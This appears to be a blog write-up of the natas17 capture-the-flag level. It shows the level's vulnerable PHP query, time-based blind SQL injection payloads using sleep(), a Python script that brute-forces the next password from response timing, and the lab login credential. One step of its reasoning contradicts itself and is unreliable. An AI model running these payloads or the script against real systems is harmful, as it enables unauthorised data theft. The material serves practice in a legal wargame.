Challange:
So we see the loginscreen again from the username to check if it exists. We had this one already. But I checked the source code and it’s not the same query. Username this time is in between double qoutes. Which cant be escaped. The query in the source code:

SELECT * from users where username=\"".$_REQUEST["username"]."\"";

They also removed the debug functionality, unfortunately. Using ” or ‘ doesn’t generate an SQL error any more. For some reason no matter what I use as input, It doesn’t give is anything back. Is it broken? No, after checking the source code, better then quickly scanning it. We can see that the feedback has been commented out.

<html>
<body>
<h1>natas17</h1>
<div id="content">
<?

/*
CREATE TABLE `users` (
  `username` varchar(64) DEFAULT NULL,
  `password` varchar(64) DEFAULT NULL
);
*/

if(array_key_exists("username", $_REQUEST)) {
    $link = mysql_connect('localhost', 'natas17', '<censored>');
    mysql_select_db('natas17', $link);
    
    $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\"";
    if(array_key_exists("debug", $_GET)) {
        echo "Executing query: $query<br>";
    }

    $res = mysql_query($query, $link);
    if($res) {
    if(mysql_num_rows($res) > 0) {
        //echo "This user exists.<br>";
    } else {
        //echo "This user doesn't exist.<br>";
    }
    } else {
        //echo "Error in query.<br>";
    }

    mysql_close($link);
} else {
?>

<form action="index.php" method="POST">
Username: <input name="username"><br>
<input type="submit" value="Check existence" />
</form>
<? } ?>
<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>
</html> 

Which means we don’t get any feedback on the website. We can use the sql injection to let the server sleep for a couple second which would delay our responce. So lets try that, but first lets see the query and how to inject into it.

Query: "SELECT * from users where username="<username> "
Payload: natas18" AND sleep(5) #
New Query:  "SELECT * from users where username="natas18" AND sleep(5) #  " 

This makes the New Query valid since natas18 is surrounded by double qoutes and comments the last double qoute. So lets test this, and yes it takes a couple seconds to return our blank page. Now we need to find out how we can use this as our response so we can recognise it and bruteforce the password like we did the last time. So lets see what our old payload was and then try it out with the sleep command.

Old payload: AND PASSWORD LIKE '%w%'
New payload: natas18" AND PASSWORD LIKE BINARY 'a%' AND sleep(5) #

If we use ‘a’ it executes the sleep, but if we use ‘c’ it doesn’t. This means that the letter c is in the password. So knowing this we can edit the python program to our new Query. Lets do that first. I edited the script and wanted to see why it didn’t sleep if i put ?username=<payload> after the URL and haven’t found any solution yet. After some searching I found out that i should do a POST request instead of a get, which I was doing. So I changed the python script to the following:

import string
import requests

characters = string.ascii_letters + string.digits
url = "http://natas17.natas.labs.overthewire.org/"
auth_username = "natas17"
auth_password = "8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw"
password = ""
passlength = 32

# go through the loop till password is 32 characters long and then go into the loop passing all characters
while len(password) != 32:
    for char in characters:
        data = {'username': 'natas18" AND password LIKE BINARY "' + password + char + '%" and sleep(2) #'}
        r = requests.post(url, data=data, auth=(auth_username, auth_password))
        if (r.elapsed.seconds > 1):
            password += char
            print("Password: {0}".format(password))

After running this we got our password of natas18. YEAH, this took quite a bit.

Leave a Reply

Your email address will not be published. Required fields are marked *